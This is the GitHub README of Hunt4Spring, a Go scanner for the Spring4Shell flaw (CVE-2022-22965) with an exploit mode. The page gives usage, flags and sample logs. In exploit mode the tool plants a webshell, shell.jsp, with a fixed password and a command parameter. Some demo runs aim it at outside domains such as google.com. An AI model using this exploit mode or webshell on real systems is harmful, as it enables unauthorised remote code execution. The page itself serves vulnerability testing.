Skip to content

A "Spring4Shell" vulnerability scanner.

License

Notifications You must be signed in to change notification settings

umair-rhl/Hunt4Spring

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Hunt4Spring

Hunt4Spring helps with identifying as well as exploiting URLs which are potentially vulnerable to CVE-2022-22965 aka Spring4Shell.

Video Demo: https://www.youtube.com/watch?v=JnAnXDFKkF0

Usage

 $ ./hunt4spring -h

  _    _             _   _  _   _____            _             
 | |  | |           | | | || | / ____|          (_)            
 | |__| |_   _ _ __ | |_| || || (___  _ __  _ __ _ _ __   __ _ 
 |  __  | | | | '_ \| __|__   _\___ \| '_ \| '__| | '_ \ / _  |
 | |  | | |_| | | | | |_   | | ____) | |_) | |  | | | | | (_| |
 |_|  |_|\__,_|_| |_|\__|  |_||_____/| .__/|_|  |_|_| |_|\__, |
                                     | |                  __/ |
                                     |_|                 |___/ 



 [+] Hunt4Spring by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
 [+] Author: Umair Nehri (RHL Research Team)
 [+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr. 

 Usage of ./hunt4spring:
 -exploit
         Turns on exploitation mode.
 -file string
         Specify a file containing a list of target URLs.
 -outfile string
         Output file name to store results. (default "hunt4spring.json")
 -url string
         Specify a single target URL.

To use the tool, you can grab any one of the binaries from the releases section or build the source code yourself. The code is in Go, hence a simple go build will do the job, provided you have a working Go setup.

Flags

In order to run Hunt4Spring, users have two options available. Either they can provide a single URL using the -url flag or provide with bulk URLs through a file by using the -file flag.

You can specify the name of the file to store the output in JSON format by using the -outfile flag. [By default the output gets stored in a file called hunt4spring.json]

$ ./hunt4spring -url http://127.0.0.1:8080/ -exploit -outfile op.json

 _    _             _   _  _   _____            _             
| |  | |           | | | || | / ____|          (_)            
| |__| |_   _ _ __ | |_| || || (___  _ __  _ __ _ _ __   __ _ 
|  __  | | | | '_ \| __|__   _\___ \| '_ \| '__| | '_ \ / _  |
| |  | | |_| | | | | |_   | | ____) | |_) | |  | | | | | (_| |
|_|  |_|\__,_|_| |_|\__|  |_||_____/| .__/|_|  |_|_| |_|\__, |
                                    | |                  __/ |
                                    |_|                 |___/ 
                                                                                                                                                                                        


[+] Hunt4Spring by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Umair Nehri (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr. 

2022/04/01 17:40:04 Checking: http://127.0.0.1:8080/
2022/04/01 17:40:04 http://127.0.0.1:8080/ [Seems to be vulnerable!]
2022/04/01 17:40:04 Trying to exploit: http://127.0.0.1:8080/
2022/04/01 17:40:06 Shell was successfully uploaded! Address: http://127.0.0.1:8080/shell.jsp?pwd=hunt4spring&cmd=whoami

+------------------------+---------------------------+
|          HOST          | VULNERABILITY POSSIBILITY |
+------------------------+---------------------------+
| http://127.0.0.1:8080/ | YES                       |
+------------------------+---------------------------+

Usage Modes

Default Mode

In the default mode, user doesn't has to specify any additional flags and this mode would be used by the tool by default. The tool will look for all URL/URLs which are potentially vulnerable to this vulnerability.

We do not have to provide any additional flags in this case.

$ ./hunt4spring -file test.txt

 _    _             _   _  _   _____            _             
| |  | |           | | | || | / ____|          (_)            
| |__| |_   _ _ __ | |_| || || (___  _ __  _ __ _ _ __   __ _ 
|  __  | | | | '_ \| __|__   _\___ \| '_ \| '__| | '_ \ / _  |
| |  | | |_| | | | | |_   | | ____) | |_) | |  | | | | | (_| |
|_|  |_|\__,_|_| |_|\__|  |_||_____/| .__/|_|  |_|_| |_|\__, |
                                    | |                  __/ |
                                    |_|                 |___/ 
                                                                                                                                                                                        


[+] Hunt4Spring by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Umair Nehri (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr. 

2022/04/01 17:42:20 Checking: http://google.com/

2022/04/01 17:42:21 Checking: https://epic.com/

2022/04/01 17:42:26 Checking: http://127.0.0.1:8082/

2022/04/01 17:42:26 Checking: http://127.0.0.1:8080/
2022/04/01 17:42:26 http://127.0.0.1:8080/ [Seems to be vulnerable!]

2022/04/01 17:42:26 Checking: http://127.0.0.1/

+------------------------+---------------------------+
|          HOST          | VULNERABILITY POSSIBILITY |
+------------------------+---------------------------+
| http://google.com/     | NO                        |
| https://epic.com/      | NO                        |
| http://127.0.0.1:8082/ | NO                        |
| http://127.0.0.1:8080/ | YES                       |
| http://127.0.0.1/      | NO                        |
+------------------------+---------------------------+

Exploit Mode

In the exploit mode, the tool would not just scan the URL/URLs but would even try to exploit them by placing a webshell in the target's root directory. The name of the webshell would be shell.jsp having the password hunt4spring.

In order to enable exploit mode, we have to provide an addtional flag (-exploit) along with the normal input flags:

$ ./hunt4spring -file test.txt -exploit

 _    _             _   _  _   _____            _             
| |  | |           | | | || | / ____|          (_)            
| |__| |_   _ _ __ | |_| || || (___  _ __  _ __ _ _ __   __ _ 
|  __  | | | | '_ \| __|__   _\___ \| '_ \| '__| | '_ \ / _  |
| |  | | |_| | | | | |_   | | ____) | |_) | |  | | | | | (_| |
|_|  |_|\__,_|_| |_|\__|  |_||_____/| .__/|_|  |_|_| |_|\__, |
                                    | |                  __/ |
                                    |_|                 |___/ 
                                                                                                                                                                                        


[+] Hunt4Spring by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Umair Nehri (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr. 

2022/04/01 17:44:03 Checking: http://google.com/
2022/04/01 17:44:04 Trying to exploit: http://google.com/

2022/04/01 17:44:06 Checking: https://epic.com/
2022/04/01 17:44:11 Trying to exploit: https://epic.com/

2022/04/01 17:44:17 Checking: http://127.0.0.1:8082/
2022/04/01 17:44:17 Trying to exploit: http://127.0.0.1:8082/

2022/04/01 17:44:17 Checking: http://127.0.0.1:8080/
2022/04/01 17:44:17 http://127.0.0.1:8080/ [Seems to be vulnerable!]
2022/04/01 17:44:17 Trying to exploit: http://127.0.0.1:8080/
2022/04/01 17:44:20 Shell was successfully uploaded! Address: http://127.0.0.1:8080/shell.jsp?pwd=hunt4spring&cmd=whoami

2022/04/01 17:44:20 Checking: http://127.0.0.1/
2022/04/01 17:44:20 Trying to exploit: http://127.0.0.1/

+------------------------+---------------------------+
|          HOST          | VULNERABILITY POSSIBILITY |
+------------------------+---------------------------+
| http://google.com/     | NO                        |
| https://epic.com/      | NO                        |
| http://127.0.0.1:8082/ | NO                        |
| http://127.0.0.1:8080/ | YES                       |
| http://127.0.0.1/      | NO                        |
+------------------------+---------------------------+

Output

The output file saves the data in JSON format like below:

[
    {
        "host": "http://127.0.0.1:8080/",
        "is_vulnerable": true,
        "exploit_completed": true,
        "payload_path": "http://127.0.0.1:8080/shell.jsp?pwd=hunt4spring\u0026cmd=whoami"
    }
]

Setting up a Test Environment

If you'd like to test out Spring4Hunt or the Spring4Shell vulnerability in general, then you can always refer to this docker image: vulfocus/spring-core-rce-2022-03-29.

The installation process is quite simple in this case as well, you just have to run the below command:

docker run -p 9090:9090 vulfocus/spring-core-rce-2022-03-29

The app should now be available at http://localhost:9090.

More details around Spring4Shell

We have covered more details around Spring4Shell Vulnerability in our blog.

License & Version

The tool is licensed under the MIT license. See LICENSE. Currently the tool is at v0.1.

Credits

The Research Team at RedHunt Labs would like to thank @vx-underground for the initial PoC.

About

A "Spring4Shell" vulnerability scanner.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Go 100.0%